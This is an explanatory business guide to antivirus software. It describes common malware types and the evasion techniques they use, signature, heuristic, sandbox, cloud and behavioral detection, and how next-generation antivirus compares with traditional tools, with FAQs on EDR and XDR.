A Guide to Antivirus Software
for Businesses
Table of Contents
In the 1970s, an emerging threat to computing, known as Creeper, appeared on the nascent security scene. This was the first acknowledged virus. A computer scientist named Ray Tomlinson quickly created an antidote to the virus, which he called Reaper. Since then, antivirus software has become one of the most popular tools for preventing cyberattacks originating from malware. According to AV-Test, the total amount of malware since 1984 has reached epic levels at 1,514,884,906. Modern antivirus software must be robustly designed to handle this onslaught.
What is Antivirus Software?
Antivirus software (AV) is used to detect the presence of malware and viruses on a computer. If detected, the AV tool will quarantine or remove the malicious software. Traditional antivirus software looks for signals of malware, such as a specific "signature", i.e., a unique string of code that identifies a particular strain of malware.
Antivirus software is sometimes built into an operating system or productivity apps, such as Microsoft Defender. However, research shows that around 121 million US adults use a third-party AV program, such as Norton AV, Avast, or Bitdefender.
Why Does a Company Need Antivirus Software?
Having a solution to malware infection is important because malware or viruses (malicious software) are used to cause harm. Such harms include stealing data and login credentials, encrypting files, extorting a ransom, and turning a computer into a "bot" under a cybercriminal's control. Some examples of malware handled by antivirus software include the following:
Ransomware
There has been an 18% year-on-year increase in ransomware. Ransom payments are also spiraling, with the largest-ever ransomware payment of $75 million paid to the DarkSide group.
Infostealers
The latest data shows that 32,339,855 computers have been compromised by infostealer malware. Infostealers sit in stealth mode, gathering data, such as login credentials, and then sending them back to the cybercriminals behind the attack. Around one in four cyberattacks involves infostealers.
Trojans
Trojan banker malware is used to steal banking credentials and make unauthorized transactions. Banking trojans are typically installed on smartphones; attacks have surged by 196%.
There are many other types of malware, including cryptojacking malware, botnets, and spyware. Antivirus software is designed to identify all forms of viruses, worms, and malware. However, the cybercriminal world has developed ways of evading detection by antivirus software.
What about evasive malware and emerging threats?
Cybercriminals, antivirus vendors, and companies are locked in a war of attrition, each time one develops a new technique, the other must respond. Cybercriminals design malware to evade detection. Evasive techniques include:
Polymorphic Malware
If traditional antivirus software looks for the signature of malware, the obvious way to evade detection is to remove the signature. Polymorphic malware changes its signature every time it is installed on a new system. A variant of polymorphic malware is metamorphic malware. This variant is highly dynamic, changing signatures and the underlying code while maintaining its core functionality.
Fileless Malware
This form of malware operates within computer memory only and so does not use files. This clever design ensures that no traces of the malware are present on the filesystem, thereby avoiding detection by conventional antivirus software.
Other methods used to hide malware from conventional AV software include obfuscation of the malware code and behavior-based evasion. The latter technique looks for signs that the malware code has been executed in a sandbox environment, which is often used to test software. If this environment is detected, the malware modifies its code to conceal its true motive.
New techniques using vibe coding to generate malware are making access to sophisticated evasive malware more accessible.
Techniques Used in Antivirus Software
Antivirus software is itself adjusting to a complex and hostile malware environment. The following techniques are commonly used by conventional AV software, each building an increasingly sophisticated approach to virus and malware detection:
Signature Detection
Conventional viruses and other malware may have unique code snippets that are recognizable by AV software, this code pattern is known as a "signature". Increasingly, malware developers have moved away from static code to more dynamic code that can evade detection from conventional signature-matching AV tools.
Heuristic-Based Detection
Polymorphic malware evades detection by signature-based antivirus software. Heuristic analysis was developed to identify polymorphic viruses. Heuristic-based detection places a suspicious file in a quarantine area, such as a virtual machine, before thoroughly analyzing its code. The suspicious file can be run in the safe virtual environment to test its capabilities.
Sandboxing
A useful aspect of an antivirus solution is the ability to isolate a suspicious package for analysis and testing. Sandboxing is a tactic used by some AV software to place potential viruses and malware into a virtual environment. Once in situ, an IT professional can run the program and analyze code.
Cloud-Based Detection
Organizations may have expanded networks that are hybrids of on-premises and public and private clouds. Cloud-based virus scans for malware on web servers. The definitions used to identify malware are stored in the cloud, rather than on devices. This enables real-time updating of the threat intelligence, helping to identify emerging threats. Updated profiles can be instantly and remotely pushed to devices across the expanded network.
Behavioral Analytics
Behavioral analysis is driven by machine learning and AI (ML/AI). The behavior in question is that of processes carried out by potential malware. The ML learns from observations over time, identifying anomalous behavior and using this as a basis to identify malware.
Next-Generation Antivirus Software (NGAV)
The ongoing development of complex and evasive malware has led to a new era in antivirus software. Next-Generation Antivirus Software (NGAV) is based on multiple layers of protection and utilizes machine learning to adapt to emerging threats and incorporate behavioral analysis. In addition to detecting polymorphic viruses, NGAV can also identify fileless malware and emerging threats.
Differences Between Next-Gen AV and Traditional AV Software
| Traditional antivirus software | Next Generation Antivirus Software (NGAV) |
|---|---|
| Based on the detection of malware using code signatures. | Uses multiple layers of techniques to detect viruses that may be evasive. |
| Not able to adapt to changing environmental conditions to identify emerging threats. | Adaptive detection based on machine learning and behavioral analysis. NGAV can detect emerging malware threats that are as yet unrecognized. |
| Must be updated periodically on the local device. This can slow down computer performance and cause delays in virus identification. | NGAV is cloud-based. Updates are in real-time and do not cause computer slowdowns. |
| Traditional AV software is installed on each endpoint manually or via a server push. Installation and updating of AV software can be time-consuming. | As a cloud-based architecture, NGAV is easy to deploy and manage from a central location. As SaaS, NGAV is highly scalable and can be deployed by using a managed service provider. |
Malware, in all its forms, is a serious problem for organizations worldwide. The impact of malware on a business includes lost revenue, data protection noncompliance fines, loss of customer trust, and ransomware infection. To help prevent the impact of viruses and malware, antivirus software has become an essential part of a cybersecurity strategy.
However, cybercriminals continually strive to stay one step ahead of detection. Evasive malware is now common. Fortunately, the security community has developed antivirus software that is in lockstep with the evasive tactics of cybercriminals. Today, Next Generation Antivirus software utilizes advanced techniques, such as machine learning and behavioral analysis, to prevent emerging threats. Used as part of a broader defense-in-depth approach to security, AV software will help to mitigate harmful threats.
FAQs
What's the difference between NGAV, EDR, and XDR?
Next-Generation Antivirus (NGAV), Endpoint Detection and Response (EDR), and Extended Detection and Response (XDR) work together as part of a Defense in Depth (DiD) approach. NGAV used machine learning and behavioral analysis to detect emerging and evasive malware threats.
EDR software provides visibility and continuous monitoring across all organizational endpoints to identify anomalous behaviors. EDR software then sends alerts with actionable intelligence to security personnel. XDR tools extend the capabilities of EDR tools to the cloud, email, and servers.
Can Next-Generation AV identify emerging threats?
Yes, NGAV is designed to identify emerging threats that cannot be identified using traditional signature-based technology. NGAV uses machine learning, which is trained on real-world threat intelligence. The antivirus engine continually updates its known malware signals. Behavioral analysis is also used by NGAV to set a process baseline for accepted behavior, which is then used to spot anomalous events that could signal malware activity.
Do traditional AV software solutions still offer protection?
Traditional AV software is increasingly being replaced by more advanced technologies. However, some free antivirus software may still use traditional signature-based AV engines to detect malicious activity. While these programs still play a part in a broader cybersecurity strategy, they will miss evasive and emerging threats.